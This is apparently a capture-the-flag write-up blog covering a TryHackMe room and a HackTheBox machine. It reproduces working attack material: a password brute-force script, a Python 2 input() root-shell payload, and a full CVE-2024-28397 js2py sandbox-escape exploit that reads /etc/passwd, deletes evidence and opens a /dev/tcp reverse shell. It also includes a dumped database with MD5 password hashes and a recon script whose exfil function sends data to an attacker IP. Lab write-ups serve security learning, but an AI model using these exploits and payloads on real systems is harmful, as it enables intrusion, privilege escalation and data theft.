            text=True
        )
        stdout, stderr = proc.communicate(input=attempt + "\n")
        if "Password matched!" in stdout:
            password += char
            found = True
            break
    if not found:
        break

print(f"\r[+] Final Password: {password}")

hansolo@contrabando:~$ python3 password_find.py
[+] Final Password: EQu5ehwHcRfZ
hansolo@contrabando:~$

we have a password : EQu5ehwHcRfZ

:::Note

Checking the /opt/generator/app.py script, it is a simple password generator:

hansolo@contrabando:~$ cat /opt/generator/app.py
import random
import string

def generate_password(length):
    characters = string.ascii_letters + string.digits + string.punctuation
    random.seed()
    secret = input("Any words you want to add to the password? ")
    password_characters = list(characters + secret)
    random.shuffle(password_characters)
    password = ''.join(password_characters[:length])

    return password

try:
    length = int(raw_input("Enter the desired length of the password: "))
except NameError:
    length = int(input("Enter the desired length of the password: "))
except ValueError:
    print("Invalid input. Using default length of 12.")
    length = 12

password = generate_password(length)
print("Generated Password:", password)
hansolo@contrabando:~$

<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-6730116050408303" crossorigin="anonymous"></script>

# /opt/generator/app.py
import random
import string

def generate_password(length):
    characters = string.ascii_letters + string.digits + string.punctuation
    random.seed()
    secret = input("Any words you want to add to the password? ")
    password_characters = list(characters + secret)
    random.shuffle(password_characters)
    password = ''.join(password_characters[:length])

    return password

try:
    length = int(raw_input("Enter the desired length of the password: "))
except NameError:
    length = int(input("Enter the desired length of the password: "))
except ValueError:
    print("Invalid input. Using default length of 12.")
    length = 12

password = generate_password(length)
print("Generated Password:", password)

:::

Analysis of the sudo configuration shows that the command can be executed with /usr/bin/python*. Upon inspecting the system, it is confirmed that Python 2 is available as one of the matching binaries, providing an additional execution vector.

hansolo@contrabando:~$ ls -la /usr/bin/python*
lrwxrwxrwx 1 root root       9 Mar 13  2020 /usr/bin/python2 -> python2.7
-rwxr-xr-x 1 root root 3657904 Dec  9  2024 /usr/bin/python2.7
lrwxrwxrwx 1 root root       9 Mar 13  2020 /usr/bin/python3 -> python3.8
-rwxr-xr-x 1 root root 5490456 Mar 18 20:04 /usr/bin/python3.8
lrwxrwxrwx 1 root root      33 Mar 18 20:04 /usr/bin/python3.8-config -> x86_64-linux-gnu-python3.8-config
lrwxrwxrwx 1 root root      16 Mar 13  2020 /usr/bin/python3-config -> python3.8-config
hansolo@contrabando:~$

Python2 being available makes this line in the generate_password function problematic:

secret = input("Any words you want to add to the password? ")

<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-6730116050408303" crossorigin="anonymous"></script>

$ python2
Python 2.7.18 (default, Aug  1 2022, 06:23:55)
[GCC 12.1.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.

>>> print(raw_input("input: "))
input: __import__("os").system("whoami")
__import__("os").system("whoami")

>>> print(input("input: "))
input: __import__("os").system("whoami")
kali
0

By executing the sudo-enabled script with Python 2 and submitting the payload

__import__("os").system("bash")

hansolo@contrabando:~$ sudo /usr/bin/python2 /opt/generator/app.py
[sudo] password for hansolo:
Enter the desired length of the password: 1'^H
Any words you want to add to the password? __import__("os").system("bash")
root@contrabando:/home/hansolo# ls
app  hansolo_userflag.txt  password_find.py
root@contrabando:/home/hansolo# cd /root
root@contrabando:~# ls
password  root.txt  secrets  smug  snap
root@contrabando:~# cat root.txt
THM{All_AbouT_xxxxxxx}
root@contrabando:~#

<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-6730116050408303" crossorigin="anonymous"></script>

Exploitation Summary

The Contrabando challenge was systematically exploited as follows:

1. HTTP Request Smuggling (CRLF Injection) – An Apache2 front-end proxy was vulnerable to CRLF injection, allowing us to smuggle a crafted request to the back-end server. This enabled the exploitation of a command injection vulnerability on the back-end, providing an initial shell inside a Docker container.
1. Internal Network Enumeration & SSRF – Within the container, network enumeration revealed an internal web service exposing a Server-Side Request Forgery (SSRF) vulnerability. This was leveraged to access and analyze the application’s source code.
1. Server-Side Template Injection (SSTI) – Combining the SSRF with a Jinja2 SSTI vulnerability in the application allowed execution of arbitrary template code, granting a shell on the host system.
1. Password Recovery & Privilege Escalation – An unquoted Bash script parameter, combined with glob matching, was used to brute-force the hansolo user password. With the password, the sudo-enabled Python2 script was exploited for Remote Code Execution (RCE), escalating privileges to root.
1. This chain of vulnerabilities—from request smuggling to RCE—ultimately allowed full compromise of the host and completion of the room.

CodeTwo HTB Writeup (Protected)

Sun, 17 Aug 2025 00:00:00 GMT

if (!passInput) {
  document.getElementById("error").textContent = "❌ Please enter a password";
  return;
}

try {
  const response = await fetch("https://passowrd-backend-production.up.railway.app/api/unlock", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ password: passInput, postId: "era" })
  });

  const res = await response.json();
  console.log(res);

  if (res.success) {
    document.getElementById("protected-content").style.display = "block";
    document.getElementById("locked").style.display = "none";
    document.getElementById("error").textContent = "";
  } else {
    document.getElementById("error").textContent = "❌ Wrong password";
  }
} catch (error) {
  console.error("Error during unlock:", error);
  document.getElementById("error").textContent = "❌ Server error, try again later";
}

} </script>

IP

10.10.xx.xx

Recon

┌──(kali㉿kali)-[~/Desktop/codetwo]
└─$ nmap -sC -sV -Pn 10.10.11.82
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-17 05:24 EDT
Nmap scan report for 10.10.11.82
Host is up (0.45s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 a0:47:b4:0c:69:67:93:3a:f9:b4:5d:b3:2f:bc:9e:23 (RSA)
|   256 7d:44:3f:f1:b1:e2:bb:3d:91:d5:da:58:0f:51:e5:ad (ECDSA)
|_  256 f1:6b:1d:36:18:06:7a:05:3f:07:57:e1:ef:86:b4:85 (ED25519)
8000/tcp open  http    Gunicorn 20.0.4
|_http-server-header: gunicorn/20.0.4
|_http-title: Welcome to CodeTwo
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.59 seconds
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Desktop/codetwo]
└─$

Ports open

we have 2 ports are open

22
8000

Web enumeration

lets see on port 8000

ok we have login and register pages

when we click on register and login buttons it was redirecting to /register && /login

<div id="locked" style=" font-family: Arial, sans-serif; max-width: 400px; margin: 20px auto; padding: 15px; border-radius: 12px; background: rgba(255, 255, 255, 0.25); backdrop-filter: blur(10px); -webkit-backdrop-filter: blur(10px); border: 1px solid rgba(255, 255, 255, 0.3); box-shadow: 0 8px 32px 0 rgba(31, 38, 135, 0.37); color: #1a1a1a; "> <p style="font-weight: bold; font-size: 1.1rem; margin-bottom: 12px; color: #fff;"><strong>This writeup is password protected 🔒</strong></p> <input style="width: 100%; padding: 8px 10px; font-size: 1rem; border: 1px solid rgba(255, 255, 255, 0.6); border-radius: 6px; box-sizing: border-box; margin-bottom: 10px; background: rgba(255,255,255,0.3); color: #0d1a36;" id="pass-input" type="password" placeholder="Enter password" /> <button style="width: 100%; background-color: rgba(0, 123, 255, 0.7); color: #e0eaff; border: none; padding: 10px; font-size: 1rem; border-radius: 6px; cursor: pointer; backdrop-filter: none;" onclick="verifyHash()">Unlock</button> <p id="error" style="color: #b00020; margin-top: 8px; font-size: 0.9rem;"></p> </div>

<h1> Hidden Dir Enumeration </h1>

Before Creating an account let find any hidden dir are present in the website

<h1> Using Gobuster </h1>

gobuster dir -u http://10.10.11.82:8000/ -w /usr/share/wordlists/dirb/common.txt -t 50

┌──(kali㉿kali)-[~/Desktop/codeway]
└─$ gobuster dir -u http://10.10.11.82:8000/ -w /usr/share/wordlists/dirb/common.txt -t 50 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.11.82:8000/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/dashboard            (Status: 302) [Size: 199] [--> /login]
/download             (Status: 200) [Size: 10696]
/login                (Status: 200) [Size: 667]
/logout               (Status: 302) [Size: 189] [--> /]
/register             (Status: 200) [Size: 651]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

we have /download path here lets see what it is !

let see what its status using curl cmd

┌──(kali㉿kali)-[~/Desktop/codeway]
└─$ curl -i http://10.10.11.82:8000/download
HTTP/1.1 200 OK
Server: gunicorn/20.0.4
Date: Sun, 17 Aug 2025 09:48:53 GMT
Connection: close
Content-Disposition: attachment; filename=app.zip
Content-Type: application/zip
Content-Length: 10696
Last-Modified: Fri, 17 Jan 2025 04:56:00 GMT
Cache-Control: no-cache
ETag: "1737089760.0-10696-2470185569"

Warning: Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal 
Warning: anyway, or consider "--output <FILE>" to save to a file.
                                                                                                                    
┌──(kali㉿kali)-[~/Desktop/codeway]
└─$

its status is 200 let download that file in zip

┌──(kali㉿kali)-[~/Desktop/codeway]
└─$ curl -o app.zip http://10.10.11.82:8000/download
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   207  100   207    0     0    524      0 --:--:-- --:--:-- --:--:--   528
                                                                                                                    
┌──(kali㉿kali)-[~/Desktop/codeway]
└─$ ls
app.zip

lets unzip that

┌──(kali㉿kali)-[~/Desktop/codeway]
└─$ unzip app.zip -d app_src                        
Archive:  app.zip
   creating: app_src/app/
   creating: app_src/app/templates/
  inflating: app_src/app/templates/login.html  
  inflating: app_src/app/templates/dashboard.html  
  inflating: app_src/app/templates/reviews.html  
  inflating: app_src/app/templates/register.html  
  inflating: app_src/app/templates/index.html  
  inflating: app_src/app/templates/base.html  
  inflating: app_src/app/requirements.txt  
   creating: app_src/app/static/
   creating: app_src/app/static/js/
  inflating: app_src/app/static/js/script.js  
   creating: app_src/app/static/css/
  inflating: app_src/app/static/css/styles.css  
  inflating: app_src/app/app.py      
   creating: app_src/app/instance/
  inflating: app_src/app/instance/users.db  
                                                                                                                    
┌──(kali㉿kali)-[~/Desktop/codeway]
└─$ 
┌──(kali㉿kali)-[~/Desktop/codeway]
└─$ ls                                              
app_src  app.zip
                                                                                                                    
┌──(kali㉿kali)-[~/Desktop/codeway]
└─$ cd app_src                                      
                                                                                                                    
┌──(kali㉿kali)-[~/Desktop/codeway/app_src]
└─$ ls
app
                                                                                                                    
┌──(kali㉿kali)-[~/Desktop/codeway/app_src]
└─$

as we obsever when it was unziping the file we have app_src/app/instance/users.db database lets see what it was using sqlite3

┌──(kali㉿kali)-[~/…/codeway/app_src/app/instance]
└─$ sqlite3 users.db         
SQLite version 3.46.1 2024-08-13 09:16:08
Enter ".help" for usage hints.
sqlite> .tables
code_snippet  user        
sqlite> SELECT * FROM user;
sqlite>

:::Note

In database(user.db) we found nothing :( :::

lets chack waht we have rest we have app.py and requirements.txt

┌──(kali㉿kali)-[~/…/codeway/app_src/app]
└─$ cat app.py
cat app.py
from flask import Flask, render_template, request, redirect, url_for, session, jsonify, send_from_directory
from flask_sqlalchemy import SQLAlchemy
import hashlib
import js2py
import os
import json

js2py.disable_pyimport()
app = Flask(__name__)
app.secret_key = 'S3cr3tK3yC0d3Tw0'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///users.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)

class User(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(80), unique=True, nullable=False)
    password_hash = db.Column(db.String(128), nullable=False)

class CodeSnippet(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
    code = db.Column(db.Text, nullable=False)

@app.route('/')
def index():
    return render_template('index.html')

@app.route('/dashboard')
def dashboard():
    if 'user_id' in session:
        user_codes = CodeSnippet.query.filter_by(user_id=session['user_id']).all()
        return render_template('dashboard.html', codes=user_codes)
    return redirect(url_for('login'))

@app.route('/register', methods=['GET', 'POST'])
def register():
    if request.method == 'POST':
        username = request.form['username']
        password = request.form['password']
        password_hash = hashlib.md5(password.encode()).hexdigest()
        new_user = User(username=username, password_hash=password_hash)
        db.session.add(new_user)
        db.session.commit()
        return redirect(url_for('login'))
    return render_template('register.html')

@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'POST':
        username = request.form['username']
        password = request.form['password']
        password_hash = hashlib.md5(password.encode()).hexdigest()
        user = User.query.filter_by(username=username, password_hash=password_hash).first()
        if user:
            session['user_id'] = user.id
            session['username'] = username;
            return redirect(url_for('dashboard'))
        return "Invalid credentials"
    return render_template('login.html')

@app.route('/logout')
def logout():
    session.pop('user_id', None)
    return redirect(url_for('index'))

@app.route('/save_code', methods=['POST'])
def save_code():
    if 'user_id' in session:
        code = request.json.get('code')
        new_code = CodeSnippet(user_id=session['user_id'], code=code)
        db.session.add(new_code)
        db.session.commit()
        return jsonify({"message": "Code saved successfully"})
    return jsonify({"error": "User not logged in"}), 401

@app.route('/download')
def download():
    return send_from_directory(directory='/home/app/app/static/', path='app.zip', as_attachment=True)

@app.route('/delete_code/<int:code_id>', methods=['POST'])
def delete_code(code_id):
    if 'user_id' in session:
        code = CodeSnippet.query.get(code_id)
        if code and code.user_id == session['user_id']:
            db.session.delete(code)
            db.session.commit()
            return jsonify({"message": "Code deleted successfully"})
        return jsonify({"error": "Code not found"}), 404
    return jsonify({"error": "User not logged in"}), 401

@app.route('/run_code', methods=['POST'])
def run_code():
    try:
        code = request.json.get('code')
        result = js2py.eval_js(code)
        return jsonify({'result': result})
    except Exception as e:
        return jsonify({'error': str(e)})

if __name__ == '__main__':
    with app.app_context():
        db.create_all()
    app.run(host='0.0.0.0', debug=True)

┌──(kali㉿kali)-[~/Desktop/codeway/app_src/app]
└─$ cat requirements.txt 
flask==3.0.3
flask-sqlalchemy==3.1.1
js2py==0.74                                                                                          
┌──(kali㉿kali)-[~/Desktop/codeway/app_src/app]
└─$

<h1> Source Code Review </h1>

<p>Inside the extracted files we found app.py and requirements.txt.</p>

app.py revealed:

Hardcoded Flask secret_key = 'S3cr3tK3yC0d3Tw0'

SQLite DB backend (users.db)

/run_code endpoint that evaluates JavaScript code using js2py.

requirements.txt pinned:

flask==3.0.3
flask-sqlalchemy==3.1.1
js2py==0.74

This is interesting because js2py==0.74 is vulnerable.

<h1> Vulnerability Discovery </h1>

The package js2py v0.74 is affected by CVE-2024-28397. This vulnerability allows an attacker to escape the sandbox and gain Python object access from inside the JavaScript runtime.

PoC reference: CVE-2024-28397

This is exploitable via the /run_code endpoint, since arbitrary code from the attacker is passed directly to js2py.eval_js().

<h1> Exploit </h1>

We exploit the endpoint to escape the sandbox and execute system commands.

lets make a python file using chatgpt

┌──(kali㉿kali)-[~/Desktop]
└─$ subl exploit.py

#!/usr/bin/env python3

import requests
import json
import sys
import time
import random
import string
from urllib.parse import urljoin

class FixedSecureExecutor:
    def __init__(self, target_ip, lhost=None, lport=None):
        self.target_ip = target_ip
        self.base_url = f"http://{target_ip}:8000"
        self.session = requests.Session()
        self.lhost = lhost
        self.lport = lport
        self.authenticate()
        
    def authenticate(self):
        """Authenticate with the application"""
        try:
            username = ''.join(random.choices(string.ascii_lowercase, k=8))
            register_data = {"username": username, "password": "password123"}
            self.session.post(urljoin(self.base_url, "/register"), data=register_data)
            self.session.post(urljoin(self.base_url, "/login"), data=register_data)
            print("[✓] Authenticated successfully")
        except:
            print("[-] Authentication failed")
    
    def execute_privileged_command(self, command, output_file):
        """Execute a command with root privileges using SUID bash"""
        payload = {
            "code": f"""let cmd = "/usr/bin/bash -p -c '{command}' > /home/app/app/static/{output_file} 2>&1";
let props = Object.getOwnPropertyNames({{}});
let getattr = props.__getattribute__;
let attr = getattr("__getattribute__");
let obj = attr("__class__").__base__;
function findpopen(o) {{
    let result;
    for(let i in o.__subclasses__()) {{
        let item = o.__subclasses__()[i];
        if(item.__module__ == "subprocess" && item.__name__ == "Popen") {{
            return item;
        }}
        if(item.__name__ != "type" && (result = findpopen(item))) {{
            return result;
        }}
    }}
}}
findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate();
console.log("Command executed");"""
        }
        
        try:
            self.session.post(
                urljoin(self.base_url, "/run_code"),
                headers={"Content-Type": "application/json"},
                data=json.dumps(paylSoad)
            )
            
            time.sleep(1)
            output_response = requests.get(f"{self.base_url}/static/{output_file}")
            if output_response.status_code == 200:
                output = output_response.text.strip()
                self.delete_file(output_file)
                return output
            else:
                self.delete_file(output_file)
                return None
        except Exception as e:
            print(f"[-] Error: {e}")
            return None
    
    def delete_file(self, filename):
        """Delete the output file for security"""
        delete_payload = {
            "code": f"""let cmd = "rm -f /home/app/app/static/{filename}";
let props = Object.getOwnPropertyNames({{}});
let getattr = props.__getattribute__;
let attr = getattr("__getattribute__");
let obj = attr("__class__").__base__;
function findpopen(o) {{
    let result;
    for(let i in o.__subclasses__()) {{
        let item = o.__subclasses__()[i];
        if(item.__module__ == "subprocess" && item.__name__ == "Popen") {{
            return item;
        }}
        if(item.__name__ != "type" && (result = findpopen(item))) {{
            return result;
        }}
    }}
}}
findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate();
console.log("File deleted");"""
        }
        try:
            self.session.post(
                urljoin(self.base_url, "/run_code"),
                headers={"Content-Type": "application/json"},
                data=json.dumps(delete_payload)
            )
        except:
            pass
    
    def cleanup_all_temp_files(self):
        """Clean up any remaining temporary files"""
        cleanup_payload = {
            "code": f"""let cmd = "rm -f /home/app/app/static/*";
let props = Object.getOwnPropertyNames({{}});
let getattr = props.__getattribute__;
let attr = getattr("__getattribute__");
let obj = attr("__class__").__base__;
function findpopen(o) {{
    let result;
    for(let i in o.__subclasses__()) {{
        let item = o.__subclasses__()[i];
        if(item.__module__ == "subprocess" && item.__name__ == "Popen") {{
            return item;
        }}
        if(item.__name__ != "type" && (result = findpopen(item))) {{
            return result;
        }}
    }}
}}
findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate();
console.log("All temp files cleaned");"""
        }
        try:
            self.session.post(
                urljoin(self.base_url, "/run_code"),
                headers={"Content-Type": "application/json"},
                data=json.dumps(cleanup_payload)
            )
        except:
            pass
    
    def read_passwd_file(self):
        """Read /etc/passwd from the target system"""
        output_file = f"passwd_{''.join(random.choices(string.ascii_lowercase, k=6))}.txt"
        cmd = "cat /etc/passwd"
        print("[+] Reading /etc/passwd ...")
        passwd_contents = self.execute_privileged_command(cmd, output_file)
        if passwd_contents:
            print("[✓] /etc/passwd contents retrieved:\n")
            print(passwd_contents)
        else:
            print("[-] Could not read /etc/passwd")
    
    def spawn_reverse_shell(self):
        """Spawn a root reverse shell to attacker machine"""
        if not self.lhost or not self.lport:
            print("[-] LHOST and LPORT must be set for reverse shell")
            return
        print(f"[+] Spawning root reverse shell to {self.lhost}:{self.lport} ...")
        rev_cmd = f"bash -i >& /dev/tcp/{self.lhost}/{self.lport} 0>&1"
        # temp file just for triggering the command
        self.execute_privileged_command(rev_cmd, f"rev_{''.join(random.choices(string.ascii_lowercase, k=6))}.txt")
        print("[✓] Reverse shell triggered! Check your listener.")

def main():
    if len(sys.argv) != 4:
        print("Usage: python3 exploit.py <target_ip> <LHOST> <LPORT>")
        sys.exit(1)
    
    target_ip = sys.argv[1]
    lhost = sys.argv[2]
    lport = int(sys.argv[3])
    
    executor = FixedSecureExecutor(target_ip, lhost, lport)
    
    # Optional: enumerate users
    executor.read_passwd_file()
    
    # Spawn root reverse shell
    executor.spawn_reverse_shell()
    
    # Cleanup any temp files
    executor.cleanup_all_temp_files()

if __name__ == "__main__":
    main()

<h1> Exploit Code Walkthrough </h1>

The script is written to exploit the vulnerable Flask web app (/run_code endpoint with js2py 0.74) and get RCE as root.

<h1> 1. Initialization </h1>

class FixedSecureExecutor:
    def __init__(self, target_ip, lhost=None, lport=None):
        self.target_ip = target_ip
        self.base_url = f"http://{target_ip}:8000"
        self.session = requests.Session()
        self.lhost = lhost
        self.lport = lport
        self.authenticate()

Stores target IP and attacker’s reverse shell info (LHOST, LPORT).
Uses a requests.Session() for persistent cookies (needed for login).
Automatically calls authenticate().

<h1> 2. Authentication </h1>

def authenticate(self):
    username = ''.join(random.choices(string.ascii_lowercase, k=8))
    register_data = {"username": username, "password": "password123"}
    self.session.post(... "/register", data=register_data)
    self.session.post(... "/login", data=register_data)
    print("[✓] Authenticated successfully")

Random username generated (8 lowercase letters).
Registers → then logs in with that same account.
Now it’s a valid logged-in user (required because /run_code endpoint is behind session auth).

<h1> 3. Command Execution via Sandbox Escape </h1>

def execute_privileged_command(self, command, output_file):
    payload = {
        "code": f"""
        let cmd = "/usr/bin/bash -p -c '{command}' > /home/app/app/static/{output_file} 2>&1";
        ...
        findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate();
        console.log("Command executed");
        """
    }
    self.session.post("/run_code", data=json.dumps(payload))
    time.sleep(1)
    output_response = requests.get(f"{self.base_url}/static/{output_file}")

This builds a malicious JavaScript payload:
Escapes js2py sandbox.
Walks Python’s class hierarchy until it finds subprocess.Popen.
Executes /usr/bin/bash -p -c '<command>'.
Redirects output to /home/app/app/static/<output_file> (web-accessible).
After execution, script fetches the output file via HTTP (/static/).

💡 bash -p is the SUID trick: it spawns bash while preserving root privileges.

<h1> 4. Deleting Evidence </h1>

def delete_file(self, filename):
    # Similar payload but runs: rm -f /home/app/app/static/<filename>

Uses the same sandbox escape trick.
Removes temporary files from /static/ to hide evidence.

There’s also:

def cleanup_all_temp_files(self):
    # Removes *all* files from /static/ (rm -f /home/app/app/static/*)

<h1> 5. Helper Functions </h1>

read_passwd_file() Executes cat /etc/passwd, stores in temp file, downloads it, prints contents. spawn_reverse_shell()

Builds command:

bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1

→ Opens a reverse shell as app.

<h1> Getting revshell </h1>

┌──(kali㉿kali)-[~/Desktop]
└─$ python3 exploit.py 10.10.11.82 10.10.xx.x 4444
[✓] Authenticated successfully
[+] Reading /etc/passwd ...
[✓] /etc/passwd contents retrieved:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
marco:x:1000:1000:marco:/home/marco:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
app:x:1001:1001:,,,:/home/app:/bin/bash
mysql:x:114:118:MySQL Server,,,:/nonexistent:/bin/false
_laurel:x:997:997::/var/log/laurel:/bin/false
[+] Spawning root reverse shell to 10.10.xx.x:4444 ...

turn on nc on another terminal

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvnp 4444               
listening on [any] 4444 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.11.82] 47804
bash: cannot set terminal process group (890): Inappropriate ioctl for device
bash: no job control in this shell
app@codetwo:~/app$

<h1> Enumeration </h1>

app@codetwo:~/app$ ls
ls
app.py
instance
__pycache__
requirements.txt
static
templates
app@codetwo:~/app$ cd instance
cd instance
app@codetwo:~/app/instance$ ls
ls
users.db
app@codetwo:~/app/instance$ cat us
cat users.db 
�O�O�J%%�Wtablecode_snippetcode_snippetCREATE TABLE code_snippet (
        id INTEGER NOT NULL, 
        user_id INTEGER NOT NULL, 
        code TEXT NOT NULL, 
        PRIMARY KEY (id), 
        FOREIGN KEY(user_id) REFERENCES user (id)
)�0�CtableuseruserCREATE TABLE user (
        id INTEGER NOT NULL, 
        username VARCHAR(80) NOT NULL, 
        password_hash VARCHAR(128) NOT NULL, 
        PRIMARY KEY (id), 
        UNIQUE (username)
)';indexx���X.��x,oindexMglgtpnfw482c811da5d5b4bc6d497ffa98491e38Mphxdxnlb482c811da5d5b4bc6d497ffa98491e38,Miaplwgzu482c811da5d5b4bc6d497ffa98491e38*Mthomasef6e65efc188e7dffd7335b646a85a21(Mjohna886f2ee22888badbce90eac740c49be(Muser5f4dcc3b5aa765d61d8327deb882cf99(Mtest098f6bcd4621d373cade4e832627b4f6'Mappa97588c0e2fa3a024876339e27aeb42e)Mmarco649c9d65a206a75f5abe509fe128bce5
        ����������
                  glgtpnfw
                                phxdxnlb
                                       iaplwgzu
f))=�8�q/* ES5.1-compatible reconnaissance script for Node or Browser */

// ====== CONFIG (optional exfil) ======
var YOUR_IP   = "10.10.14.44";   // ör: "192.168.45.213"
var YOUR_PORT = "4444";   // ör: "8000"
// =====================================

function safe(fn, def) {
  try { return fn(); } catch (e) { return def; }
}

function exfil(data) {
  try {
    if (!YOUR_IP || !YOUR_PORT) return; // sadece konsola yaz
    var url = "http://" + YOUR_IP + ":" + YOUR_PORT + "/?d=" +
              encodeURIComponent(JSON.stringify(data));
    // Node'de isek http modülüyle; tarayıcıdaysak fetch/xhr deneriz.
    if (isNode()) {
      var http = requireLike("http");
      if (http) {
        var req = http.get(url, function(res){ /* ignore */ });
        req.on("error", function(e){ /* ignore */ });
      }
    } else {
      // Tarayıcı: fetch yoksa XHR
      if (typeof fetch !== "undefined") {
        fetch(url)["catch"](function(){});
      } else if (typeof XMLHttpRequest !== "undefined") {
        var x = new XMLHttpRequest();
        x.open("GET", url, true);
        x.send();
      }
    }
  } catch (e) { /* yut */ }
}

function isNode() {
  return typeof process !== "undefined" &&
         process && process.versions && process.versions.node;
}

// Try hard to obtain require in sandboxed Node
function obtainProcess() {
  // 1) Doğrudan
  if (typeof process !== "undefined") return process;
  // 2) Function hilesi
  try { return Function("return process")(); } catch(e){}
  // 3) globalThis/this
  try { return Function("return this")().process; } catch(e){}
  return null;
}

function obtainModule() {
  // Bazı sandbox'larda module'a erişilebilir
  try { return Function("return module")�)var x= 16;
x;
(); } catch(e){}
  return null;
}

function requireLike(mod) {
  // 1) native require
  try { if (typeof require !== "undefined") return require(mod); } catch(e){}
  // 2) process.mainModule.require
  var proc = obtainProcess();
  try {
    if (proc && proc.mainModule && proc.mainModule.require) {
      return proc.mainModule.require(mod);
    }
  } catch(e){}
  // 3) Module constructor üzerinden
  var m = obtainModule();
  try {
    if (m && m.constructor && m.constructor._load) {
      return m.constructor._load(mod);
    }
  } catch(e){}
  return null;
}

function runCmd(cmd) {
  var out = {cmd: cmd, stdout: null, stderr: null, ok: false};
  try {
    var cp = requireLike("child_process");
    if (!cp || !cp.execSync) return out;
    var res = cp.execSync(cmd, {encoding: "utf8"});
    out.stdout = res;
    out.ok = true;
  } catch (e) {
    out.stderr = String(e && e.message ? e.message : e);
  }
  return out;
}

function readFileSafe(p) {
  var fs = requireLike("fs");
  if (!fs) return null;
  try { return fs.readFileSync(p, "utf8"); } catch (e) { return null; }
}

function listDirSafe(p) {
  var fs = requireLike("fs");
  var out = {path: p, entries: null, error: null};
  if (!fs) return out;
  try {
    var arr = fs.readdirSync(p);
    out.entries = arr;
  } catch (e) {
    out.error = String(e && e.message ? e.message : e);
  }
  return out;
}

function nodeRecon() {
  var info = {};
  var proc = obtainProcess() || process;

  info.runtime = "node";
  info.versions = safe(function(){ return proc.versions; }, null);
  info.platform = safe(function(){ return proc.platform; }, null);
  info.arch     = safe(function(){ return proc.arch; }, null);
  info.cwd      = safe(function(){ return requireLike("process").cwd(); }, null);
  info.env      = safe(function(){ return proc.env; }, null);

  // Komut çıktıları
  info.exec = [];
  var cmds = ["id", "whoami", "uname -a", "ps aux || ps -ef", "ls -la", "ifconfig || ip a"];
